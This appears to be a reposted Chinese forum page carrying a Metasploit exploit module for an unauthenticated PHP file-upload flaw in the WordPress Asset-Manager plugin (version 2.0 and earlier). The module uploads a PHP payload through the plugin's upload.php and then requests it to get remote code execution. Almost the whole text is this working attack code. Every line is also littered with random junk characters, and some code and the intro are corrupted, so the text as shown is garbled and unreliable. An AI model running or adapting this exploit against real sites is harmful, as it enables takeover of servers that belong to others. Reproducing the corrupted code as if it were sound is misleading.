这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
* q" K* @6 j: U0 T! k7 }4 d6 O- W5 V% o2 n: \4 K
##
/ ^6 `' k m# J H# This file is part of the Metasploit Framework and may be subject to
1 P; C% e* e" `$ A( q# C" y# redistribution and commercial restrictions. Please see the Metasploit
- ^6 [# X2 g: p% ]0 |- e8 o# Framework web site for more information on licensing and terms of use." n, ^, ]8 g4 h8 c1 C, d ]
# http://metasploit.com/framework/
( ?& q4 p# R3 |7 k##
* n0 L6 b( d1 }$ _& ?5 ~) W# L* B " o0 ^/ W, q' s i( l6 S& H
require 'msf/core'' h# C- a2 T* A; v) ?/ v* N
require 'msf/core/exploit/php_exe'
6 K9 F0 R8 r5 v - `2 G6 t1 y+ c. l
class Metasploit3 < Msf::Exploit::Remote
* q* |+ T! o5 n: ]6 [, U0 v! W Rank = ExcellentRanking
) [% Q0 O: [. M+ t 6 I4 R# Y$ p& M/ a- O
include Msf::Exploit::Remote::HttpClient
+ X6 X; a# M9 H3 z3 h include Msf::Exploit:hpEXE
' Q% `+ r8 s- C1 h R O
5 o/ x: `, k6 g" \9 D4 z4 D def initialize(info = {}). k- @. \" Q4 T' }2 P- I4 K
super(update_info(info,
+ S: s8 r; g: z6 N: \' ?5 Q6 B 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
% C& C+ q/ E1 b, Z' `0 v1 e 'Description' => %q{, Y' e2 O6 U- Z# K1 U a4 a a7 n
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress% e7 _* }" Q: z
plugin. By abusing the upload.php file, a malicious user can upload a file to a3 g% n$ W( m6 ]% {; C
temp directory without authentication, which results in arbitrary code execution.
4 C0 E- A5 W/ d, d" w& e+ P3 q+ y0 y },
! N2 b9 ^; T5 f* @/ Y 'Author' =>
* C* \7 y9 Q# a0 ?# A [
: D0 q$ B/ o& w. W 'Sammy FORGIT', # initial discovery( m: ?+ C1 F4 J0 e+ _! r
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
; |6 y2 \- c5 K+ C0 L6 g) T2 h ],
! S B& O0 L2 ] 'License' => MSF_LICENSE,; z- K4 `* P/ p! j* g, j2 t
'References' =>6 a( ?! f5 l, m" r$ X6 N- ]( a/ q
[
; Q2 C" q) n7 V- a* G- R/ Q5 d [ 'OSVDB', '82653' ],
. ?3 A8 f8 V: E% W [ 'BID', '53809' ],
/ B" J1 `8 C' }( S% L4 x [ 'EDB', '18993' ],
. _& J# r, ^# u# ?/ O/ t [ 'URL', 'http:// www.myhack58.com /' ]6 T6 Y" E4 O7 Q2 C' A4 h8 S2 S
],
7 [" D3 e) C3 g, Q4 q4 \6 }) w 'Payload' =>
6 l# [, W. c7 y! E; w! Z5 G" t {+ z+ z$ a8 J- t7 z% X$ f& ~
'BadChars' => "\x00",0 s+ s% }: Z. u4 D
},
- w5 D: y4 t, x6 }/ e6 p( M 'Platform' => 'php', Y2 h# b3 q& n+ U, r! T: F
'Arch' => ARCH_PHP,* N* C" p" h' f+ d# B
'Targets' =>
. O" a3 [( i" ^0 l: z, P [, m8 @1 N& @$ `& }$ k- Q
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],; g6 z3 Q4 a8 j3 l( z% A5 D
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
$ O5 K' D' ]+ T2 a6 m. ? ],
# X8 G, G1 u% y 'DefaultTarget' => 0,5 x5 ]' \: r# O3 s
'DisclosureDate' => 'May 26 2012'))& F9 {" j5 A. {) b0 A5 k0 G2 p* C- M
2 ~4 ?" n: \- i
register_options(
# M6 g2 W8 a) N8 n% \ [# Q8 n6 F* ?9 f- S1 @4 V Y
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
# r; y3 C# B% f( F8 t2 c ], self.class)
4 j, e) K9 L g& @$ R end
% |5 U& K+ [' i7 d. C % W& z( U$ z$ e) l0 J
def exploit' ]; t: x* L( M- R( B5 `6 _- b
uri = target_uri.path. ` U8 c0 x3 @: C
uri << '/' if uri[-1,1] != '/'
0 ~" O/ ]0 c+ L' @) M. G/ I% S: Q peer = "#{rhost}:#{rport}"9 c, g& O" h! e: g r& o
payload_name = "#{rand_text_alpha(5)}.php"! P6 Y S; o. x
php_payload = get_write_exec_payload(:unlink_self=>true)5 x8 i; ~& e- o0 ?' O6 I! d
( A# i. [+ e: G# j
data = Rex::MIME::Message.new
9 W1 y5 v% g, n& N. D5 t) z7 T* q7 _ data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")" \& d& h7 N) v7 V8 R
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
" l! ^+ v5 ~, p& @% ?5 A3 B
0 Y N4 F, n& J" J) X, c print_status("#{peer} - Uploading payload #{payload_name}")$ }0 u& m* Z2 y1 V4 N; `7 k* Y- w
res = send_request_cgi({) L/ O P# @/ Y2 N- v. k, ^
'method' => 'POST',* J9 Z) F7 I4 Q* C
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
: i& }: r7 f! s' |& ` 'ctype' => "multipart/form-data; boundary=#{data.bound}",8 e' l" Z' m8 t2 W& R! f
'data' => post_data
/ E, w& t8 R* M0 W/ V0 \ })7 u' V: w7 c; i
. z0 E( b; @2 j' e
if not res or res.code != 200 or res.body !~ /#{payload_name}// I! S* \$ o' Q$ B3 ]& U+ D' R
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
1 w3 L4 [, W t! gend
- j+ z7 b, \: g. Y: `/ W" U
( S* `) ], f, X5 D print_status("#{peer} - Executing payload #{payload_name}")
9 C' C% U9 l# g. J res = send_request_raw({
3 W/ C' c/ c/ g' B7 { 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
* `2 g3 q' r( P) ]& ? 'method' => 'GET'
, }6 v( _- o+ T })
7 O3 N5 J( ]8 a/ f ; l- O* ]% ~. V1 ~4 r" R% Q
if res and res.code != 200
3 A3 o- ^, X7 k7 F4 H: ~ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
9 c1 |9 s2 r4 N( s/ W4 H5 G7 e% a end
, q8 ~, }- A0 l end: y9 j* w' ~+ [& F5 L' T
end
& Y- Z, c2 V5 j8 R n' y |